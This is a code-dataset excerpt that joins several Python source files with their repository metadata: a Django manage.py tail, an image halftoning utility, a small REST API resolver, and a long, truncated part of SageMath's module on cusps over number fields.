except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
| 29.043478 | 76 | 0.679641 |
acfa78cbe4c59ab5e95f26b6c085cde0e33b148a | 3,353 | py | Python | utils/halftone.py | Nikronic/Deep-Halftoning | 9564c592abf139ccab2791c1dbb354505edab5f9 | [
"MIT"
] | null | null | null | utils/halftone.py | Nikronic/Deep-Halftoning | 9564c592abf139ccab2791c1dbb354505edab5f9 | [
"MIT"
] | 1 | 2021-11-07T12:13:38.000Z | 2021-11-07T12:13:38.000Z | utils/halftone.py | Nikronic/Deep-Halftoning | 9564c592abf139ccab2791c1dbb354505edab5f9 | [
"MIT"
] | null | null | null | # %% libraries
import PIL.Image as Image
import numpy.matlib
import numpy as np
import random
import math
# %% functions
dithMat =[
# 8x8 sprial
[[62, 58, 45, 41, 37, 49, 53, 61],
[54, 34, 25, 21, 17, 29, 33, 57],
[ 50, 30, 13, 9, 5, 12, 24, 44],
[ 38, 18, 6, 1, 0, 8, 20, 40],
[42, 22, 10, 2, 3, 4, 16, 36],
[46, 26, 14, 7, 11, 15, 28, 48],
[59, 35, 31, 19, 23, 27, 32, 52],
[ 63, 55, 51, 39, 43, 47, 56, 60]],
# 8x8 dispresed
[[ 1, 30, 8, 28, 2, 29, 7, 27],
[ 17, 9, 24, 16, 18, 10, 23, 15],
[ 5, 25, 3, 32, 6, 26, 4, 31],
[ 21, 13, 19, 11, 22, 14, 20, 12],
[ 2, 29, 7, 27, 1, 30, 8, 28],
[ 18, 10, 23, 15, 17, 9, 24, 16],
[ 6, 26, 4, 31, 5, 25, 3, 32],
[ 22, 14, 20, 12, 21, 13, 19, 11]],
# 8X8 octa_dot
[[ 45, 17, 25, 37, 47, 19, 27, 39],
[ 49, 1, 9, 57, 51, 3, 11, 59],
[ 29, 33, 41, 21, 31, 35, 43, 23],
[ 13, 61, 53, 5, 15, 63, 55, 7],
[ 48, 20, 28, 40, 46, 18, 26, 38],
[ 52, 4, 12, 60, 50, 2, 10, 58],
[ 32, 36, 44, 24, 30, 34, 42, 22],
[ 16, 64, 56, 8, 14, 62, 54, 6]],
# 5x5 diamond
[[ 5, 118, 160, 58, 17],
[ 48, 201, 232, 170, 99],
[ 129, 211, 252, 242, 150],
[ 89, 191, 221, 181, 68],
[ 38, 78, 140, 108, 27]],
# 5x5 clockwise sprial
[[3, 10, 16, 11, 4],
[ 9, 20, 21, 17, 12],
[ 15, 24, 25, 22, 13],
[ 8, 19, 23, 18, 5],
[ 2, 7, 14, 6, 1]],
# 4x4 ordered
[[ 5, 9, 6, 10],
[ 13, 1, 14, 2],
[ 7 ,11, 4, 8],
[ 15, 3, 12, 0]],
]
def get_resDmat(channel_size,dithMat):
newSzY,newSzX = channel_size[1],channel_size[0]
minDmat = min(min(dithMat))
maxDmat = max(max(dithMat))
nbOfIntervals = maxDmat-minDmat+2
singleInterval = 255/nbOfIntervals
scaledDithMat = np.multiply(np.subtract(dithMat , minDmat+1),singleInterval)
scaledDithMat = scaledDithMat.astype(int)
dmatSzY, dmatSzX = len(scaledDithMat),len(scaledDithMat[0])
nX = math.ceil(newSzX / dmatSzX)
nY = math.ceil(newSzY / dmatSzY)
resDmat = np.matlib.repmat(scaledDithMat.astype(int), nY, nX)[:newSzY,:newSzX]
return resDmat
def generate_halftone(im):
cmyk_im = im.convert('CMYK')
dithMat_sample = dithMat[random.randint(0, len(dithMat) - 1)]
cmyk = cmyk_im.split()
angles = [[ 15, 45, 0, 75],
[ 45, 15, 0, 75],
[ 0, 0, 0, 0]]
angles = angles[random.randint(0, len(angles) - 1)]
if cmyk[0] == cmyk[1] == cmyk[2] :
angles = angles[:1]*4
dots = []
for x,i in enumerate(cmyk):
channel_Rotation = i.rotate(angles[x], expand=1)
channel = np.asarray(channel_Rotation) > get_resDmat(channel_Rotation.size,dithMat_sample)
channel = Image.fromarray((channel * 255).astype('uint8')).convert('L').rotate(-angles[x], expand=1)
# https://stackoverflow.com/questions/27622834/write-numpy-ndarray-to-image
# reason of casting to 'uint8'
w,h = channel.size
im_x,im_y = i.size
x1 = (w-im_x)/2
y1 = (h-im_y)/2
channel = channel.crop((x1, y1, x1+im_x, y1+im_y))
dots.append(channel)
halftoned_im = Image.merge('CMYK',dots)
return halftoned_im.convert('RGB')
# %% test
# im = Image.open('data/Places365_val_00000001.jpg')
# imh = generate_halftone(im)
# imh.show()
| 31.336449 | 108 | 0.532657 |
acfa790d44cfb9df77894e0a3bd7167767e656d1 | 674 | py | Python | rls/resolvers.py | chesnovsky/rls-sdk | e6eccb83d13cbc9e2756634e569aadb41c175d5b | [
"MIT"
] | 7 | 2017-09-08T02:15:52.000Z | 2020-04-02T07:16:19.000Z | rls/resolvers.py | chesnovsky/rls-sdk | e6eccb83d13cbc9e2756634e569aadb41c175d5b | [
"MIT"
] | 16 | 2017-07-26T15:01:33.000Z | 2018-12-10T20:45:47.000Z | rls/resolvers.py | chesnovsky/rls-sdk | e6eccb83d13cbc9e2756634e569aadb41c175d5b | [
"MIT"
] | 5 | 2018-10-10T18:37:50.000Z | 2020-04-06T21:28:03.000Z | from .api import Api
from .exceptions import MissingParam
class Resolver:
def __init__(self):
self.url = ''
self.method = ''
self.api = Api()
def setup(self, api_map=None, **kwargs):
url = api_map['url']
method = api_map['method']
try:
url = url.format(**kwargs)
except KeyError as param:
raise MissingParam(param=param)
self.method = method
self.url = url
def resolve(self, api_key, api_map=None, json=None, **kwargs):
self.setup(api_map=api_map, **kwargs)
return self.api.request(url=self.url, method=self.method, api_key=api_key, json=json)
| 25.923077 | 93 | 0.596439 |
acfa7a5ebb7c5a93edbcf71c907d757be4c566f0 | 40,766 | py | Python | src/sage/modular/cusps_nf.py | UCD4IDS/sage | 43474c96d533fd396fe29fe0782d44dc7f5164f7 | [
"BSL-1.0"
] | 1,742 | 2015-01-04T07:06:13.000Z | 2022-03-30T11:32:52.000Z | src/sage/modular/cusps_nf.py | UCD4IDS/sage | 43474c96d533fd396fe29fe0782d44dc7f5164f7 | [
"BSL-1.0"
] | 66 | 2015-03-19T19:17:24.000Z | 2022-03-16T11:59:30.000Z | src/sage/modular/cusps_nf.py | UCD4IDS/sage | 43474c96d533fd396fe29fe0782d44dc7f5164f7 | [
"BSL-1.0"
] | 495 | 2015-01-10T10:23:18.000Z | 2022-03-24T22:06:11.000Z | r"""
The set `\mathbb{P}^1(K)` of cusps of a number field `K`
AUTHORS:
- Maite Aranes (2009): Initial version
EXAMPLES:
The space of cusps over a number field k::
sage: k.<a> = NumberField(x^2 + 5)
sage: kCusps = NFCusps(k); kCusps
Set of all cusps of Number Field in a with defining polynomial x^2 + 5
sage: kCusps is NFCusps(k)
True
Define a cusp over a number field::
sage: NFCusp(k, a, 2/(a+1))
Cusp [a - 5: 2] of Number Field in a with defining polynomial x^2 + 5
sage: kCusps((a,2))
Cusp [a: 2] of Number Field in a with defining polynomial x^2 + 5
sage: NFCusp(k,oo)
Cusp Infinity of Number Field in a with defining polynomial x^2 + 5
Different operations with cusps over a number field::
sage: alpha = NFCusp(k, 3, 1/a + 2); alpha
Cusp [a + 10: 7] of Number Field in a with defining polynomial x^2 + 5
sage: alpha.numerator()
a + 10
sage: alpha.denominator()
7
sage: alpha.ideal()
Fractional ideal (7, a + 3)
sage: M = alpha.ABmatrix(); M # random
[a + 10, 2*a + 6, 7, a + 5]
sage: NFCusp(k, oo).apply(M)
Cusp [a + 10: 7] of Number Field in a with defining polynomial x^2 + 5
Check Gamma0(N)-equivalence of cusps::
sage: N = k.ideal(3)
sage: alpha = NFCusp(k, 3, a + 1)
sage: beta = kCusps((2, a - 3))
sage: alpha.is_Gamma0_equivalent(beta, N)
True
Obtain transformation matrix for equivalent cusps::
sage: t, M = alpha.is_Gamma0_equivalent(beta, N, Transformation=True)
sage: M[2] in N
True
sage: M[0]*M[3] - M[1]*M[2] == 1
True
sage: alpha.apply(M) == beta
True
List representatives for Gamma_0(N) - equivalence classes of cusps::
sage: Gamma0_NFCusps(N)
[Cusp [0: 1] of Number Field in a with defining polynomial x^2 + 5,
Cusp [1: 3] of Number Field in a with defining polynomial x^2 + 5,
...]
"""
# ****************************************************************************
# Copyright (C) 2009, Maite Aranes <M.T.Aranes@warwick.ac.uk>
#
# Distributed under the terms of the GNU General Public License (GPL)
# https://www.gnu.org/licenses/
# ****************************************************************************
from sage.structure.parent import Parent
from sage.structure.element import Element, is_InfinityElement
from sage.structure.richcmp import richcmp, rich_to_bool
from sage.structure.unique_representation import UniqueRepresentation
from sage.misc.cachefunc import cached_method, cached_function
@cached_function
def list_of_representatives(N):
"""
Return a list of ideals, coprime to the ideal ``N``, representatives of
the ideal classes of the corresponding number field.
.. NOTE::
This list, used every time we check `\\Gamma_0(N)` - equivalence of
cusps, is cached.
INPUT:
- ``N`` -- an ideal of a number field.
OUTPUT:
A list of ideals coprime to the ideal ``N``, such that they are
representatives of all the ideal classes of the number field.
EXAMPLES::
sage: from sage.modular.cusps_nf import list_of_representatives
sage: k.<a> = NumberField(x^4 + 13*x^3 - 11)
sage: N = k.ideal(713, a + 208)
sage: L = list_of_representatives(N); L
(Fractional ideal (1),
Fractional ideal (47, a - 9),
Fractional ideal (53, a - 16))
"""
return NFCusps_ideal_reps_for_levelN(N)[0]
@cached_function
def NFCusps(number_field):
r"""
The set of cusps of a number field `K`, i.e. `\mathbb{P}^1(K)`.
INPUT:
- ``number_field`` -- a number field
OUTPUT:
The set of cusps over the given number field.
EXAMPLES::
sage: k.<a> = NumberField(x^2 + 5)
sage: kCusps = NFCusps(k); kCusps
Set of all cusps of Number Field in a with defining polynomial x^2 + 5
sage: kCusps is NFCusps(k)
True
Saving and loading works::
sage: loads(kCusps.dumps()) == kCusps
True
"""
return NFCuspsSpace(number_field)
# *************************************************************************
# NFCuspsSpace class *
# *************************************************************************
class NFCuspsSpace(UniqueRepresentation, Parent):
"""
The set of cusps of a number field. See ``NFCusps`` for full documentation.
EXAMPLES::
sage: k.<a> = NumberField(x^2 + 5)
sage: kCusps = NFCusps(k); kCusps
Set of all cusps of Number Field in a with defining polynomial x^2 + 5
"""
def __init__(self, number_field):
"""
See ``NFCusps`` for full documentation.
EXAMPLES::
sage: k.<a> = NumberField(x^3 + x^2 + 13)
sage: kCusps = NFCusps(k); kCusps
Set of all cusps of Number Field in a with defining polynomial x^3 + x^2 + 13
"""
self.__number_field = number_field
Parent.__init__(self, self)
def __eq__(self, right):
"""
Return equality only if right is the set of cusps for the same field.
EXAMPLES::
sage: k.<a> = NumberField(x^2 + 5)
sage: L.<a> = NumberField(x^2 + 23)
sage: kCusps = NFCusps(k); kCusps
Set of all cusps of Number Field in a with defining polynomial x^2 + 5
sage: LCusps = NFCusps(L); LCusps
Set of all cusps of Number Field in a with defining polynomial x^2 + 23
sage: kCusps == NFCusps(k)
True
sage: LCusps == NFCusps(L)
True
sage: LCusps == kCusps
False
"""
if not isinstance(right, NFCuspsSpace):
return False
return self.number_field() == right.number_field()
def __ne__(self, right):
"""
Check that ``self`` is not equal to ``right``.
EXAMPLES::
sage: k.<a> = NumberField(x^2 + 5)
sage: L.<a> = NumberField(x^2 + 23)
sage: kCusps = NFCusps(k); kCusps
Set of all cusps of Number Field in a with defining polynomial x^2 + 5
sage: LCusps = NFCusps(L); LCusps
Set of all cusps of Number Field in a with defining polynomial x^2 + 23
sage: kCusps != NFCusps(k)
False
sage: LCusps != NFCusps(L)
False
sage: LCusps != kCusps
True
"""
return not (self == right)
def _repr_(self):
"""
String representation of the set of cusps of a number field.
EXAMPLES::
sage: k.<a> = NumberField(x^2 + 2)
sage: kCusps = NFCusps(k)
sage: kCusps
Set of all cusps of Number Field in a with defining polynomial x^2 + 2
sage: kCusps._repr_()
'Set of all cusps of Number Field in a with defining polynomial x^2 + 2'
sage: kCusps.rename('Number Field Cusps'); kCusps
Number Field Cusps
sage: kCusps.rename(); kCusps
Set of all cusps of Number Field in a with defining polynomial x^2 + 2
"""
return "Set of all cusps of %s" % self.number_field()
def _latex_(self):
r"""
Return latex representation of self.
EXAMPLES::
sage: k.<a> = NumberField(x^2 + 5)
sage: kCusps = NFCusps(k)
sage: latex(kCusps) # indirect doctest
\mathbf{P}^1(\Bold{Q}[a]/(a^{2} + 5))
"""
return r"\mathbf{P}^1(%s)" % self.number_field()._latex_()
def __call__(self, x):
"""
Convert x into the set of cusps of a number field.
EXAMPLES::
sage: k.<a> = NumberField(x^2 + 5)
sage: kCusps = NFCusps(k)
sage: c = kCusps(a,2)
Traceback (most recent call last):
...
TypeError: ...__call__() takes 2 positional arguments but 3 were given
::
sage: c = kCusps((a,2)); c
Cusp [a: 2] of Number Field in a with defining polynomial x^2 + 5
sage: kCusps(2/a)
Cusp [-2*a: 5] of Number Field in a with defining polynomial x^2 + 5
sage: kCusps(oo)
Cusp Infinity of Number Field in a with defining polynomial x^2 + 5
"""
return NFCusp(self.number_field(), x, parent=self)
@cached_method
def zero(self):
"""
Return the zero cusp.
.. NOTE::
This method just exists to make some general algorithms work.
It is not intended that the returned cusp is an additive
neutral element.
EXAMPLES::
sage: k.<a> = NumberField(x^2 + 5)
sage: kCusps = NFCusps(k)
sage: kCusps.zero()
Cusp [0: 1] of Number Field in a with defining polynomial x^2 + 5
"""
return self(0)
def number_field(self):
"""
Return the number field that this set of cusps is attached to.
EXAMPLES::
sage: k.<a> = NumberField(x^2 + 1)
sage: kCusps = NFCusps(k)
sage: kCusps.number_field()
Number Field in a with defining polynomial x^2 + 1
"""
return self.__number_field
# *************************************************************************
# NFCusp class *
# *************************************************************************
class NFCusp(Element):
r"""
Create a number field cusp, i.e., an element of `\mathbb{P}^1(k)`.
A cusp on a number field is either an element of the field or infinity,
i.e., an element of the projective line over the number field. It is
stored as a pair (a,b), where a, b are integral elements of the number
field.
INPUT:
- ``number_field`` -- the number field over which the cusp is defined.
- ``a`` -- it can be a number field element (integral or not), or
a number field cusp.
- ``b`` -- (optional) when present, it must be either Infinity or
coercible to an element of the number field.
- ``lreps`` -- (optional) a list of chosen representatives for all the
ideal classes of the field. When given, the representative of the cusp
will be changed so its associated ideal is one of the ideals in the list.
OUTPUT:
``[a: b]`` -- a number field cusp.
EXAMPLES::
sage: k.<a> = NumberField(x^2 + 5)
sage: NFCusp(k, a, 2)
Cusp [a: 2] of Number Field in a with defining polynomial x^2 + 5
sage: NFCusp(k, (a,2))
Cusp [a: 2] of Number Field in a with defining polynomial x^2 + 5
sage: NFCusp(k, a, 2/(a+1))
Cusp [a - 5: 2] of Number Field in a with defining polynomial x^2 + 5
Cusp Infinity:
::
sage: NFCusp(k, 0)
Cusp [0: 1] of Number Field in a with defining polynomial x^2 + 5
sage: NFCusp(k, oo)
Cusp Infinity of Number Field in a with defining polynomial x^2 + 5
sage: NFCusp(k, 3*a, oo)
Cusp [0: 1] of Number Field in a with defining polynomial x^2 + 5
sage: NFCusp(k, a + 5, 0)
Cusp Infinity of Number Field in a with defining polynomial x^2 + 5
Saving and loading works:
::
sage: alpha = NFCusp(k, a, 2/(a+1))
sage: loads(dumps(alpha))==alpha
True
Some tests:
::
sage: I*I
-1
sage: NFCusp(k, I)
Traceback (most recent call last):
...
TypeError: unable to convert I to a cusp of the number field
::
sage: NFCusp(k, oo, oo)
Traceback (most recent call last):
...
TypeError: unable to convert (+Infinity, +Infinity) to a cusp of the number field
::
sage: NFCusp(k, 0, 0)
Traceback (most recent call last):
...
TypeError: unable to convert (0, 0) to a cusp of the number field
::
sage: NFCusp(k, "a + 2", a)
Cusp [-2*a + 5: 5] of Number Field in a with defining polynomial x^2 + 5
::
sage: NFCusp(k, NFCusp(k, oo))
Cusp Infinity of Number Field in a with defining polynomial x^2 + 5
sage: c = NFCusp(k, 3, 2*a)
sage: NFCusp(k, c, a + 1)
Cusp [-a - 5: 20] of Number Field in a with defining polynomial x^2 + 5
sage: L.<b> = NumberField(x^2 + 2)
sage: NFCusp(L, c)
Traceback (most recent call last):
...
ValueError: Cannot coerce cusps from one field to another
"""
def __init__(self, number_field, a, b=None, parent=None, lreps=None):
"""
Constructor of number field cusps. See ``NFCusp`` for full
documentation.
EXAMPLES::
sage: k.<a> = NumberField(x^2 + 1)
sage: c = NFCusp(k, 3, a+1); c
Cusp [3: a + 1] of Number Field in a with defining polynomial x^2 + 1
sage: c.parent()
Set of all cusps of Number Field in a with defining polynomial x^2 + 1
sage: kCusps = NFCusps(k)
sage: c.parent() is kCusps
True
"""
if parent is None:
parent = NFCusps(number_field)
Element.__init__(self, parent)
R = number_field.maximal_order()
if b is None:
if not a: # that is cusp "0"
self.__a = R.zero()
self.__b = R.one()
return
if isinstance(a, NFCusp):
if a.parent() == parent:
self.__a = R(a.__a)
self.__b = R(a.__b)
else:
raise ValueError("Cannot coerce cusps from one field to another")
elif a in R:
self.__a = R(a)
self.__b = R.one()
elif a in number_field:
self.__b = R(a.denominator())
self.__a = R(a * self.__b)
elif is_InfinityElement(a):
self.__a = R.one()
self.__b = R.zero()
elif isinstance(a, int):
self.__a = R(a)
self.__b = R.one()
elif isinstance(a, (tuple, list)):
if len(a) != 2:
raise TypeError("unable to convert %r to a cusp \
of the number field" % a)
if a[1].is_zero():
self.__a = R.one()
self.__b = R.zero()
elif a[0] in R and a[1] in R:
self.__a = R(a[0])
self.__b = R(a[1])
elif isinstance(a[0], NFCusp): # we know that a[1] is not zero
if a[1] == 1:
self.__a = a[0].__a
self.__b = a[0].__b
else:
r = a[0].__a / (a[0].__b * a[1])
self.__b = R(r.denominator())
self.__a = R(r * self.__b)
else:
try:
r = number_field(a[0] / a[1])
self.__b = R(r.denominator())
self.__a = R(r * self.__b)
except (ValueError, TypeError):
raise TypeError("unable to convert %r to a cusp "
"of the number field" % a)
else:
try:
r = number_field(a)
self.__b = R(r.denominator())
self.__a = R(r * self.__b)
except (ValueError, TypeError):
raise TypeError("unable to convert %r to a cusp "
"of the number field" % a)
else: # 'b' is given
if is_InfinityElement(b):
if is_InfinityElement(a) or (isinstance(a, NFCusp) and a.is_infinity()):
raise TypeError("unable to convert (%r, %r) "
"to a cusp of the number field" % (a, b))
self.__a = R.zero()
self.__b = R.one()
return
elif not b:
if not a:
raise TypeError("unable to convert (%r, %r) "
"to a cusp of the number field" % (a, b))
self.__a = R.one()
self.__b = R.zero()
return
if not a:
self.__a = R.zero()
self.__b = R.one()
return
if (b in R or isinstance(b, int)) and (a in R or isinstance(a, int)):
self.__a = R(a)
self.__b = R(b)
else:
if a in R or a in number_field:
r = a / b
elif is_InfinityElement(a):
self.__a = R.one()
self.__b = R.zero()
return
elif isinstance(a, NFCusp):
if a.is_infinity():
self.__a = R.one()
self.__b = R.zero()
return
r = a.__a / (a.__b * b)
elif isinstance(a, int):
r = R(a) / b
elif isinstance(a, (tuple, list)):
if len(a) != 2:
raise TypeError("unable to convert (%r, %r) \
to a cusp of the number field" % (a, b))
r = R(a[0]) / (R(a[1]) * b)
else:
try:
r = number_field(a) / b
except (ValueError, TypeError):
raise TypeError("unable to convert (%r, %r) \
to a cusp of the number field" % (a, b))
self.__b = R(r.denominator())
self.__a = R(r * self.__b)
if lreps is not None:
# Changes the representative of the cusp so the ideal associated
# to the cusp is one of the ideals of the given list lreps.
# Note: the trivial class is always represented by (1).
I = self.ideal()
for J in lreps:
if (J / I).is_principal():
newI = J
l = (newI / I).gens_reduced()[0]
self.__a = R(l * self.__a)
self.__b = R(l * self.__b)
def _repr_(self):
"""
String representation of this cusp.
EXAMPLES::
sage: k.<a> = NumberField(x^2 + 1)
sage: c = NFCusp(k, a, 2); c
Cusp [a: 2] of Number Field in a with defining polynomial x^2 + 1
sage: c._repr_()
'Cusp [a: 2] of Number Field in a with defining polynomial x^2 + 1'
sage: c.rename('[a:2](cusp of a number field)');c
[a:2](cusp of a number field)
sage: c.rename();c
Cusp [a: 2] of Number Field in a with defining polynomial x^2 + 1
"""
if self.__b.is_zero():
return "Cusp Infinity of %s" % self.parent().number_field()
else:
return "Cusp [%s: %s] of %s" % (self.__a, self.__b,
self.parent().number_field())
def number_field(self):
"""
Return the number field of definition of the cusp ``self``.
EXAMPLES::
sage: k.<a> = NumberField(x^2 + 2)
sage: alpha = NFCusp(k, 1, a + 1)
sage: alpha.number_field()
Number Field in a with defining polynomial x^2 + 2
"""
return self.parent().number_field()
def is_infinity(self):
"""
Return ``True`` if this is the cusp infinity.
EXAMPLES::
sage: k.<a> = NumberField(x^2 + 1)
sage: NFCusp(k, a, 2).is_infinity()
False
sage: NFCusp(k, 2, 0).is_infinity()
True
sage: NFCusp(k, oo).is_infinity()
True
"""
return self.__b == 0
def numerator(self):
"""
Return the numerator of the cusp ``self``.
EXAMPLES::
sage: k.<a> = NumberField(x^2 + 1)
sage: c = NFCusp(k, a, 2)
sage: c.numerator()
a
sage: d = NFCusp(k, 1, a)
sage: d.numerator()
1
sage: NFCusp(k, oo).numerator()
1
"""
return self.__a
def denominator(self):
"""
Return the denominator of the cusp ``self``.
EXAMPLES::
sage: k.<a> = NumberField(x^2 + 1)
sage: c = NFCusp(k, a, 2)
sage: c.denominator()
2
sage: d = NFCusp(k, 1, a + 1);d
Cusp [1: a + 1] of Number Field in a with defining polynomial x^2 + 1
sage: d.denominator()
a + 1
sage: NFCusp(k, oo).denominator()
0
"""
return self.__b
def _number_field_element_(self):
"""
Coerce to an element of the number field.
EXAMPLES::
sage: k.<a> = NumberField(x^2 + 2)
sage: NFCusp(k, a, 2)._number_field_element_()
1/2*a
sage: NFCusp(k, 1, a + 1)._number_field_element_()
-1/3*a + 1/3
"""
if self.__b.is_zero():
raise TypeError("%s is not an element of %s" % (self,
self.number_field()))
k = self.number_field()
return k(self.__a / self.__b)
def _ring_of_integers_element_(self):
"""
Coerce to an element of the ring of integers of the number field.
EXAMPLES::
sage: k.<a> = NumberField(x^2 + 2)
sage: NFCusp(k, a+1)._ring_of_integers_element_()
a + 1
sage: NFCusp(k, 1, a + 1)._ring_of_integers_element_()
Traceback (most recent call last):
...
TypeError: Cusp [1: a + 1] of Number Field in a with defining polynomial x^2 + 2 is not an integral element
"""
if self.__b.is_one():
return self.__a
R = self.number_field().ring_of_integers()
if self.__b.is_zero():
raise TypeError("%s is not an element of %s" % (self, R))
try:
return R(self.__a / self.__b)
except (ValueError, TypeError):
raise TypeError("%s is not an integral element" % self)
def _latex_(self):
r"""
Latex representation of this cusp.
EXAMPLES::
sage: k.<a> = NumberField(x^2 + 11)
sage: latex(NFCusp(k, 3*a, a + 1)) # indirect doctest
\[3 a: a + 1\]
sage: latex(NFCusp(k, 3*a, a + 1)) == NFCusp(k, 3*a, a + 1)._latex_()
True
sage: latex(NFCusp(k, oo))
\infty
"""
if self.__b.is_zero():
return "\\infty"
else:
return "\\[%s: %s\\]" % (self.__a._latex_(),
self.__b._latex_())
def _richcmp_(self, right, op):
"""
Compare the cusps ``self`` and ``right``.
Comparison is as for elements in the number field, except with
the cusp oo which is greater than everything but itself.
The ordering in comparison is only really meaningful for infinity.
EXAMPLES::
sage: k.<a> = NumberField(x^3 + x + 1)
sage: kCusps = NFCusps(k)
Comparing with infinity::
sage: c = kCusps((a,2))
sage: d = kCusps(oo)
sage: c < d
True
sage: kCusps(oo) < d
False
Comparison as elements of the number field::
sage: kCusps(2/3) < kCusps(5/2)
False
sage: k(2/3) < k(5/2)
False
"""
if self.__b.is_zero():
if right.__b.is_zero():
return rich_to_bool(op, 0)
else:
return rich_to_bool(op, 1)
else:
if right.__b.is_zero():
return rich_to_bool(op, -1)
else:
return richcmp(self._number_field_element_(),
right._number_field_element_(), op)
def __neg__(self):
"""
The negative of this cusp.
EXAMPLES::
sage: k.<a> = NumberField(x^2 + 23)
sage: c = NFCusp(k, a, a+1); c
Cusp [a: a + 1] of Number Field in a with defining polynomial x^2 + 23
sage: -c
Cusp [-a: a + 1] of Number Field in a with defining polynomial x^2 + 23
"""
return NFCusp(self.parent().number_field(), -self.__a, self.__b)
def apply(self, g):
"""
Return g(``self``), where ``g`` is a 2x2 matrix, which we view as a
linear fractional transformation.
INPUT:
- ``g`` -- a list of integral elements [a, b, c, d] that are the
entries of a 2x2 matrix.
OUTPUT:
A number field cusp, obtained by the action of ``g`` on the cusp
``self``.
EXAMPLES::
sage: k.<a> = NumberField(x^2 + 23)
sage: beta = NFCusp(k, 0, 1)
sage: beta.apply([0, -1, 1, 0])
Cusp Infinity of Number Field in a with defining polynomial x^2 + 23
sage: beta.apply([1, a, 0, 1])
Cusp [a: 1] of Number Field in a with defining polynomial x^2 + 23
"""
k = self.number_field()
return NFCusp(k, g[0] * self.__a + g[1] * self.__b,
g[2] * self.__a + g[3] * self.__b)
def ideal(self):
"""
Return the ideal associated to the cusp ``self``.
EXAMPLES::
sage: k.<a> = NumberField(x^2 + 23)
sage: alpha = NFCusp(k, 3, a-1)
sage: alpha.ideal()
Fractional ideal (3, 1/2*a - 1/2)
sage: NFCusp(k, oo).ideal()
Fractional ideal (1)
"""
k = self.number_field()
return k.ideal(self.__a, self.__b)
    def ABmatrix(self):
        """
        Return AB-matrix associated to the cusp ``self``.
        Given R a Dedekind domain and A, B ideals of R in inverse classes, an
        AB-matrix is a matrix realizing the isomorphism between R+R and A+B.
        An AB-matrix associated to a cusp [a1: a2] is an AB-matrix with A the
        ideal associated to the cusp (A=<a1, a2>) and first column given by
        the coefficients of the cusp.
        EXAMPLES:
        ::
            sage: k.<a> = NumberField(x^3 + 11)
            sage: alpha = NFCusp(k, oo)
            sage: alpha.ABmatrix()
            [1, 0, 0, 1]
        ::
            sage: alpha = NFCusp(k, 0)
            sage: alpha.ABmatrix()
            [0, -1, 1, 0]
        Note that the AB-matrix associated to a cusp is not unique, and the
        output of the ``ABmatrix`` function may change.
        ::
            sage: alpha = NFCusp(k, 3/2, a-1)
            sage: M = alpha.ABmatrix()
            sage: M # random
            [-a^2 - a - 1, -3*a - 7, 8, -2*a^2 - 3*a + 4]
            sage: M[0] == alpha.numerator() and M[2]==alpha.denominator()
            True
        An AB-matrix associated to a cusp alpha will send Infinity to alpha:
        ::
            sage: alpha = NFCusp(k, 3, a-1)
            sage: M = alpha.ABmatrix()
            sage: (k.ideal(M[1], M[3])*alpha.ideal()).is_principal()
            True
            sage: M[0] == alpha.numerator() and M[2]==alpha.denominator()
            True
            sage: NFCusp(k, oo).apply(M) == alpha
            True
        """
        k = self.number_field()
        A = self.ideal()
        # The cusps at infinity and zero have canonical AB-matrices.
        if self.is_infinity():
            return [1, 0, 0, 1]
        if not self:
            return [0, -1, 1, 0]
        # Pick B in the inverse ideal class of A, so that A*B is principal.
        if A.is_principal():
            B = k.ideal(1)
        else:
            B = k.ideal(A.gens_reduced()[1]) / A
        assert (A * B).is_principal()
        a1 = self.__a
        a2 = self.__b
        # g is a generator of the principal ideal A*B.
        g = (A * B).gens_reduced()[0]
        Ainv = A**(-1)
        A1 = a1 * Ainv
        A2 = a2 * Ainv
        # r lies in A1 with 1 - r in A2 (element_1_mod). The second
        # column (b1, b2) then satisfies a1*b2 - a2*b1 = g, so the
        # matrix has determinant g.
        r = A1.element_1_mod(A2)
        b1 = -(1 - r) / a2 * g
        b2 = (r / a1) * g
        ABM = [a1, b1, a2, b2]
        return ABM
    def is_Gamma0_equivalent(self, other, N, Transformation=False):
        r"""
        Check if cusps ``self`` and ``other`` are `\Gamma_0(N)`- equivalent.
        INPUT:
        - ``other`` -- a number field cusp or a list of two number field
          elements which define a cusp.
        - ``N`` -- an ideal of the number field (level)
        OUTPUT:
        - bool -- ``True`` if the cusps are equivalent.
        - a transformation matrix -- (if ``Transformation=True``) a list of
          integral elements [a, b, c, d] which are the entries of a 2x2 matrix
          M in `\Gamma_0(N)` such that M * ``self`` = ``other`` if ``other``
          and ``self`` are `\Gamma_0(N)`- equivalent. If ``self`` and ``other``
          are not equivalent it returns zero.
        EXAMPLES:
        ::
            sage: K.<a> = NumberField(x^3-10)
            sage: N = K.ideal(a-1)
            sage: alpha = NFCusp(K, 0)
            sage: beta = NFCusp(K, oo)
            sage: alpha.is_Gamma0_equivalent(beta, N)
            False
            sage: alpha.is_Gamma0_equivalent(beta, K.ideal(1))
            True
            sage: b, M = alpha.is_Gamma0_equivalent(beta, K.ideal(1),Transformation=True)
            sage: alpha.apply(M)
            Cusp Infinity of Number Field in a with defining polynomial x^3 - 10
        ::
            sage: k.<a> = NumberField(x^2+23)
            sage: N = k.ideal(3)
            sage: alpha1 = NFCusp(k, a+1, 4)
            sage: alpha2 = NFCusp(k, a-8, 29)
            sage: alpha1.is_Gamma0_equivalent(alpha2, N)
            True
            sage: b, M = alpha1.is_Gamma0_equivalent(alpha2, N, Transformation=True)
            sage: alpha1.apply(M) == alpha2
            True
            sage: M[2] in N
            True
        """
        k = self.number_field()
        other = NFCusp(k, other)
        # Necessary condition: the ideals of the two cusps must lie in
        # the same ideal class.
        if not (self.ideal() / other.ideal()).is_principal():
            if not Transformation:
                return False
            else:
                return False, 0
        # Normalize both cusps against the same list of ideal class
        # representatives before comparing.
        reps = list_of_representatives(N)
        alpha1 = NFCusp(k, self, lreps=reps)
        alpha2 = NFCusp(k, other, lreps=reps)
        delta = k.ideal(alpha1.__b) + N
        # Second invariant: <denominator> + N must agree.
        if (k.ideal(alpha2.__b) + N) != delta:
            if not Transformation:
                return False
            else:
                return False, 0
        M1 = alpha1.ABmatrix()
        M2 = alpha2.ABmatrix()
        A = alpha1.ideal()
        B = k.ideal(M1[1], M1[3])
        ABdelta = A * B * delta * delta
        # Search for a unit u making the cross term land in ABdelta;
        # that witnesses Gamma_0(N)-equivalence.
        units = units_mod_ideal(ABdelta)
        for u in units:
            if (M2[2] * M1[3] - u * M1[2] * M2[3]) in ABdelta:
